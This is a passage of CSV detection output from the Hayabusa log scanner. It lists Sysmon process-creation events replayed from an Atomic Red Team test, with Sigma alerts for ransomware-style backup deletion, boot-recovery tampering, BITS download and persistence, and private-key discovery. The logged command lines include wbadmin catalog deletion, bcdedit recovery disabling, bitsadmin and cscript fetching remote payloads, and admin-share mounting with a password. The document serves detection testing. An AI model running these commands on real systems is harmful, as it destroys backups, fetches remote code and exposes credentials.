powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe delete catalog -quiet : Path: C:\Windows\System32\wbadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe"" : Path: C:\Windows\System32\wbengine.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe : Path: C:\Windows\System32\vds.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot 
Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} recoveryenabled no : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /create AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md 
C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" : 
Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /complete AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /resume AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b 
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 
/u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .key : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: 
